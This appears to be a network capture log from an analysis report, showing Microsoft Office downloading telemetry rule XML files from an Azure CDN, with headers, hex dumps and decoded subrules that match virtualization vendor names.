                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: f331b8e7-a01e-0070-470c-36573b000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-1749fc9bdbdlzhmchC1DFWe68s00000002e000000000dyzc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        50192.168.2.54975813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:28 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 0d7aed76-401e-0035-4255-3582d8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142528Z-1749fc9bdbds4vwlhC1DFWz44000000002f000000000gutn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        51192.168.2.54976013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7fcrtpchC1DFW52e80000000kt000000000e65x
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        52192.168.2.54976213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7flf9g6hC1DFWmcx8000000098g00000000emyb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        53192.168.2.54976113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7fvllnfhC1DFWxkg80000000kwg000000002pcd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        54192.168.2.54976313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 842612a7-c01e-00a2-75a0-342327000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-r178fb8d765w8fzdhC1DFW8ep400000002hg00000000dssp
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        55192.168.2.54976413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7fx6rhxhC1DFW76kg0000000ku0000000004pap
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        56192.168.2.54976513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142530Z-16547b76f7fljddfhC1DFWeqbs00000000ug000000004kkg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        57192.168.2.54976613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:30 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142530Z-16547b76f7fnlcwwhC1DFWz6gw0000000kvg00000000ctzg
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
